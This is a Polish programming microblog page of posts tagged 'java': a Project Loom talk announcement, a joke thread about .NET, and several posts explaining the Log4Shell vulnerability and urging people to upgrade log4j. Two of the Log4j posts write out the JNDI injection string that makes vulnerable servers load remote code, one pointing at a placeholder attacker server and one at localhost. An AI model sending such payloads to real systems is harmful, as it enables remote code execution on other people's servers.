Wpisy z tagiem: java

Wpisy z tagiem: java

Tagi popularne na mikroblogu

S9
scibi_92

Jeśli kogoś interesuje project Loom w Javce to zachęcam zarezerwować sobie czas w poniedziałek o 20 :D

Project Loom: Revolution in concurrency or obscure implementation detail?

https://www.youtube.com/watch?v=n_XRUljffu0
6 głosów Obserwuj Komentuj Udostępnij
Zobacz pozostałe 22 komentarze
AF
Afish

@maszrum: Spotkanie na razie odwołane przez Covid :(

maszrum
maszrum

Właśnie przeczytałem maila, szkoda.

.andy
.andy

Dlaczego powstał .NOT a raczej Microsoft Java :P
FIWzxaPVUAUb8BO.png
FIW7ij8VgAMESeK.png
FIW7i_CVEAEw2CU.png

Załącznik 0
Załącznik 1
Załącznik 2
10 głosów Obserwuj Komentuj Udostępnij
Zobacz pozostałe 36 komentarzy
.andy
.andy

@vpiotr: openSUSE ale może się skusze na pomiot od RedHata (Fedora). Ogólnie KDE jest mega do personalizacji i właśnie dlatego zrezygnowałem kiedyś z Gnome dla niego.
Mogę system ustawić pod moją osobę.

vpiotr
vpiotr

@.andy: ja nigdy jakoś nie potrzebowałem personalizować nic poza toolbarem. Na początku swojej bytności na linuchu coś tam jeszcze mi się chciało doinstalowywać, teraz po prostu konfiguruję toolbara w Cinnamon i mam to co mi potrzeba: swicher pulpitów, odkrywcę pulpitu, godzinę. A KDE jakoś dla mnie odstaje jakością czcionki domyślnej (którą pewnie gdzieś tam można zmienić) i ogólną ciężkością.

KacperSzurek
KacperSzurek

Mój film na temat Log4j.
Jeśli nie wiesz o co chodzi w "Log4Shell" - tu zobaczysz przykłady.

  • Proste wyjaśnienie błędu
  • Użycie Canary Tokens do wykrycia podatnych aplikacji
  • Kradzież zmiennych środowiskowych
  • RCE w starszych i nowszych wersjach Javy
  • LOG4J_FORMAT_MSG_NO_LOOKUPS
  • Co robić jak żyć

Wyjaśnienie błędu w Log4j

Na czym polega błąd w bibliotece Log4j2? Jak może wyglądać podatny kod? Do czego można wykorzystać tą podatność? Co zrobić i jak się ochronić? W tym filmie t...

https://www.youtube.com/watch?v=sPa83lM7YJs
Zobacz całość
6 głosów Obserwuj Komentuj Udostępnij
KacperSzurek
KacperSzurek

O co chodzi z podatnością "log4j"?
Szybkie wyjaśnienie dla osób nietechnicznych.

  1. Log4j to bardzo popularna biblioteka używana w aplikacjach stworzonych w języku Java.
    Służy ona do zapisywania logów z działania programu.
    Log to chronologiczny zapis tego co dzieje się w systemie informatycznym.
    Może być przydatny podczas rozwiązywania problemów.

  2. Kilka dni temu odkryto błąd w bibliotece.
    Jeżeli w tekście, który został przesłany do biblioteki znajduje się odpowiednio zapisany adres do strony - to program spróbuje się z nim połączyć a następnie wykonać kod, który tam znalazł.

  3. Wykorzystanie tego błędu jest banalnie proste.
    Wystarczy, że do strony wyślesz ciąg: ${jndi:ldap://tutajadresdotwojegoserwera}
    Log4j spróbuje wtedy połączyć się z Twoim serwerem i pobrać z niego plik, który następnie postara się uruchomić.
    Ten plik może być złośliwy.

  4. Ale jak ten adres dostaje się do serwera?
    Czy muszę go przesłać przez formularz?
    Niestety problem nie dotyczy tylko formularzy.
    Każde miejsce, które pozwala na przesłanie tekstu może być podatne.
    Atakujący próbują na oślep wysyłać ten tekst gdziekolwiek tylko jest to możliwe.

  5. Podatnych jest tysiące serwerów i programów.
    Z racji popularności biblioteki jest ona używana w wielu produktach.
    Co możesz zrobić?
    Sprawdź, czy nie pojawiła się aktualizacja do Twoich ulubionych aplikacji.
    Jeśli jesteś programistą to zaktualizuj log4j do wersji 2.15.0.

  6. Więcej technicznych informacji znajdziesz na stronie cert.pl.

Ps. Takie grafiki umieszczam też na Instagramie i Twitterze.

Załącznik 0
Zobacz całość
30 głosów Obserwuj Komentuj Udostępnij
Zobacz pozostałe 44 komentarze
vpiotr
vpiotr

Nadaje się też do "programistyczne WTF" - lista odkrywanych problemów w log4j wydaje się nie mieć końca, właśnie wydano log4j 2.17: https://www.zdnet.com/article/apache-releases-new-2-17-0-patch-for-log4j-to-solve-denial-of-service-vulnerability/

FS
FullSnack

patchowanko bibliotek apache nie ma konca

Dzikoysk
Dzikoysk

Dzień dobry, jak już ktoś rano wstanie do pracy, to niech zacznie dzień od przejrzenia dependów we wszystkich swoich projektach i trybie powiedziałbym pilnym bumpnie wersję log4j o ile używa do 2.15+. Warto też powiadomić inne zespoły, tak na wszelki wypadek. Opisałem na Twitterku więcej o tym RCE, to nie ma sensu przepisywać drugi raz:

TL;DR Jeżeli tak, to macie prawdopodobnie solidne RCE które można napisać w jakiś 3 linijkach (np. fake serwer LDAP z klasą z exploitem) wysyłając do waszej usługi wiadomość z adresem do tego serwera XD Coś w stylu:

Kopiuj
logger.info("${jndi:ldap://127.0.0.1:1389/whatever}");

Teraz wystarczy że ten placeholder w jakiś sposób trafi do waszych logów od strony usera (wiadomości/niepoprawny input/wyjątki/adresy) i tak właściwie, to właśnie wszedł Wam do systemu.

Tymczasem pozostaje mi życzyć spokojnego piątku :)

24 głosy Obserwuj Komentuj Udostępnij
Zobacz pozostałe 37 komentarzy
Dzikoysk
Dzikoysk

Dlatego ogłaszaliśmy w czwartek wieczorem ( ͡° ͜ʖ ͡°)

Dzikoysk
Dzikoysk

https://twitter.com/yazicivo/status/1469393075768373255 potwierdzone, że bumpnięta Java neguje tylko te najprostsze konkretne ataki, ale dalej jest podatna na RCE wrzucane w innej postaci.